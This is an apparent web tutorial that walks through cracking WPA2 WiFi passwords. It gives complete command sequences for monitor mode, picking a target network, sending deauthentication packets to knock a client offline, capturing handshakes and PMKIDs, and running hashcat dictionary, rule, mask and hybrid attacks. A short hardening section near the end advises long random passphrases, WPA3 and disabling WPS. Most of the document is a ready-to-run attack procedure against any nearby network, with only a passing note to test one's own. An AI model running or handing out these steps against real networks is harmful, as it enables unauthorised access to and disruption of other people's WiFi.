Capture the Handshake, Feed It to Your GPU, Watch It Crack
Capture the handshake. Feed it to your GPU. Watch 5 million guesses per second do the rest.
Most home WiFi passwords live inside a 14-million-word list thatβs been public since 2009. This tutorial shows you exactly how that works.
WPA2-PSK protects 90% of home networks. Itβs crackable with a $30 adapter, hashcat, and a wordlist. Every cracking step runs natively on Windows.
π§ How WPA2 Cracking Actually Works β Plain English
Think of your WiFi password as a secret handshake between your phone and your router. Every time a device connects, they exchange an encrypted conversation called a 4-way handshake to prove they both know the password.
That handshake travels through the air as radio waves. Anyone with the right antenna can capture it. They canβt read the password directly β itβs encrypted β but they can take that encrypted blob offline and throw millions of guesses at it until one matches.
Thatβs what hashcat does. It takes the captured handshake, runs your GPU at full blast, and tests millions of passwords per second against it. If the password exists in a common wordlist like rockyou.txt β 14 million leaked real passwords β it cracks in seconds.
| Concept | What It Means |
|---|---|
| 4-way handshake | Encrypted proof that a device knows the WiFi password β captured over the air |
| Hashcat | GPU-powered tool that tests millions of password guesses per second against a captured handshake |
| Wordlist (rockyou.txt) | 14 million+ real passwords leaked from breaches β covers ~70% of home WiFi passwords |
| Monitor mode | Special adapter mode that listens to ALL wireless traffic, not just your network |
| Deauthentication | Sending a disconnect signal to force a device to reconnect β triggering a fresh handshake |
Pro tip: Thereβs also a newer attack called PMKID that grabs a hash directly from the router without needing any connected clients. Faster and cleaner β covered in the advanced section below.
βοΈ What You Need β Hardware & Software
| Component | What It Does | Where to Get It |
|---|---|---|
| WiFi adapter with monitor mode | Built-in WiFi cards canβt capture raw packets β you need an external adapter that supports monitor mode + packet injection | Alfa AWUS036ACH β most recommended. Any Realtek RTL8812AU or Atheros chipset works. |
| Kali Linux (bootable USB) | The capture phase needs Linux tools. Boot from USB, capture, reboot to Windows. | kali.org/get-kali |
| Hashcat (Windows native) | GPU-accelerated password cracker. Runs natively on Windows β no Linux needed for cracking. | hashcat.net/hashcat |
| rockyou.txt wordlist | 14 million+ real leaked passwords | Included in Kali at /usr/share/wordlists/rockyou.txt.gz β copy to USB |
| hcxtools / cap2hashcat | Converts .cap capture files to hashcatβs .hc22000 format |
Online converter (no install) or GitHub - hcxtools Windows |
The Windows workflow in 3 stages:
Capture β Boot Kali from USB β capture handshake β save .capfile to USB stick (~5 min)
Convert β Back on Windows β upload .capto hashcat.net/cap2hashcat β download.hc22000file
Crack β Run hashcat on Windows with your GPU β password appears
Linux time: 5 minutes total. Everything else is Windows.
π‘ Step 1: Capture the Handshake (Kali USB)
Boot into Kali Linux from your USB drive. Plug in your external WiFi adapter.
1.1 β Verify your adapter is detected:
lsusb
You should see your Alfa (or similar) adapter listed.
1.2 β Enable monitor mode:
airmon-ng start wlan0
Your adapter is now wlan0mon β it listens to all wireless traffic in range.
1.3 β Scan for networks:
airodump-ng wlan0mon
This displays every WiFi network nearby:
| Column | What It Shows |
|---|---|
| BSSID | Routerβs MAC address (you need this) |
| CH | Channel number (you need this) |
| ENC | Encryption type β look for WPA2 |
| ESSID | Network name |
| STATION | Connected client devices (you need one of these) |
Note down the BSSID, channel, and one client MAC address of your target network.
1.4 β Focus on the target and start recording:
airodump-ng -c [CHANNEL] --bssid [TARGET_BSSID] -w capture wlan0mon
This locks onto one network and saves all traffic to capture-01.cap.
1.5 β Force a handshake (deauthentication):
Open a second terminal:
aireplay-ng -0 5 -a [TARGET_BSSID] -c [CLIENT_MAC] wlan0mon
This sends 5 disconnect packets to the client device. It drops off the network for a split second, reconnects automatically, and sends a fresh handshake through the air β which your adapter captures.
1.6 β Confirm the handshake:
Watch the top-right of your airodump-ng window. When you see:
WPA handshake: [MAC_ADDRESS]
You have what you need. Press Ctrl+C to stop.
1.7 β Copy files to USB:
cp capture-01.cap /media/[YOUR_USB_DRIVE]/
cp /usr/share/wordlists/rockyou.txt.gz /media/[YOUR_USB_DRIVE]/
Reboot into Windows.
π Step 2: Convert the Capture File (Windows)
Hashcat needs .hc22000 format β not raw .cap. Two ways to convert:
Option A β Online converter (easiest, no install):
- Go to hashcat.net/cap2hashcat
- Upload your
capture-01.capfile - Download the converted
.hc22000file
Option B β hcxpcapngtool locally (Windows binary):
Download pre-compiled Windows binaries from hcxtools-windows on GitHub, then:
hcxpcapngtool.exe -o hash.hc22000 capture-01.cap
Either way, you now have a hash.hc22000 file ready for cracking.
π₯ Step 3: Crack the Password (Hashcat on Windows)
Extract hashcat to a folder. Open Command Prompt or PowerShell. Decompress rockyou if needed:
gzip -d rockyou.txt.gz
Or use 7-Zip to extract it.
3.1 β Basic dictionary attack:
hashcat.exe -m 22000 hash.hc22000 rockyou.txt
| Flag | What It Does |
|---|---|
-m 22000 |
WPA-PBKDF2-PMKID+EAPOL hash mode (modern WPA2) |
hash.hc22000 |
Your converted capture file |
rockyou.txt |
14 million passwords to try |
If the password is in the wordlist β it cracks in seconds to minutes depending on your GPU.
3.2 β Dictionary + rules (smarter mutations):
hashcat.exe -m 22000 hash.hc22000 rockyou.txt -r rules/best64.rule
This takes every word in the list and mutates it β adding numbers, capitalizing, appending years, reversing letters. Catches passwords like Fluffy2024! that arenβt in the raw wordlist.
3.3 β Brute-force digits only (phone numbers, PINs):
hashcat.exe -m 22000 hash.hc22000 -a 3 --increment --increment-min 8 --increment-max 12 ?d?d?d?d?d?d?d?d?d?d?d?d
Tests every possible combination of 8-12 digit numbers. Catches numeric-only passwords.
3.4 β Hybrid: wordlist + digits appended:
hashcat.exe -m 22000 hash.hc22000 -a 6 rockyou.txt ?d?d?d?d
Tests every word with 4 digits appended β catches patterns like monkey1234, dragon2025.
3.5 β Check results:
hashcat.exe -m 22000 hash.hc22000 --show
Performance tips:
| Flag | Effect |
|---|---|
-w 3 |
Maximum GPU workload (PC becomes unresponsive β fastest cracking) |
-O |
Optimized kernels for passwords β€15 characters (significant speed boost) |
--force |
Override warnings (use if hashcat complains about drivers) |
Expected speeds by GPU:
| GPU | Approx. Speed |
|---|---|
| GTX 1060 | ~100K H/s |
| RTX 3070 | ~500K H/s |
| RTX 3090 | ~800K H/s |
| RTX 4090 | ~1.2M H/s |
β‘ Advanced: PMKID Attack (No Clients Needed)
The classic method above requires a connected device to deauthenticate. The PMKID attack skips that entirely β it grabs a hash directly from the router.
Many routers cache a PMKID (Pairwise Master Key Identifier) for roaming. You can request it without any clients being connected.
In Kali:
# Stop interfering services
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service
# Capture PMKIDs (runs for 60 seconds)
sudo hcxdumptool -i wlan0 -o dumpfile.pcapng --active_beacon --enable_status=15
# Convert to hashcat format
hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng
Back on Windows β crack the same way:
hashcat.exe -m 22000 hash.hc22000 rockyou.txt
| Classic Handshake | PMKID |
|---|---|
| Needs a connected client | No clients needed |
| Requires deauth + reconnect | Requests hash directly from router |
| Can fail if no devices are online | Works on any vulnerable router |
| Captures 4-way handshake | Captures PMKID from first handshake message |
Not every router is vulnerable to PMKID β but many are. Try it first. Fall back to classic deauth if it doesnβt work.
π‘οΈ How to Make YOUR WiFi Uncrackable
Everything above stops working the moment you fix your password.
| Fix | Why It Works |
|---|---|
| 15+ character random passphrase | correct-horse-battery-staple takes centuries. fluffy2024 takes seconds. Length wins. |
| Avoid dictionary words entirely | If itβs in rockyou.txt β cracked before your GPU warms up |
| Enable WPA3 (if router supports it) | WPA3 uses SAE β immune to offline dictionary attacks entirely |
| Disable WPS | WPS PIN can be brute-forced in hours. Itβs a backdoor most people forget exists. |
| Use a random password generator | openssl rand -base64 20 or any password manager. No wordlist will ever contain it. |
| Check connected devices regularly | Router admin panel β Attached Devices. Unknown MACs = someoneβs already in. |
The real lesson: WPA2 isnβt broken β weak passwords are. A truly random 20-character password makes this entire tutorial useless. Thatβs the point.
π οΈ All Tools & Resources
| Tool | What It Does | Link |
|---|---|---|
| Hashcat | GPU password cracker (Windows native) | hashcat.net |
| Aircrack-ng | Monitor mode, scanning, deauth, capture | aircrack-ng.org |
| hcxdumptool | PMKID + handshake capture tool | GitHub |
| hcxtools | Convert captures to hashcat format | GitHub |
| hcxtools Windows | Pre-compiled Windows binaries | GitHub |
| cap2hashcat online | Convert without installing anything | hashcat.net/cap2hashcat |
| Hashcat WPA2 wiki | Official cracking documentation | hashcat.net wiki |
| Kali Linux | Penetration testing OS (USB bootable) | kali.org |
| Alfa AWUS036ACH | Most recommended monitor-mode adapter | alfa.com.tw |
Quick Hits
| Want | Do |
|---|---|
β Kali USB β airmon-ng β airodump-ng β aireplay-ng |
|
β Kali β hcxdumptool β hcxpcapngtool |
|
| β hashcat.net/cap2hashcat | |
β hashcat.exe -m 22000 hash.hc22000 rockyou.txt |
|
| β 15+ char random passphrase + WPA3 + disable WPS |
Test your own network. Fix your own password. Donβt be the one running βpassword123β in 2026.
!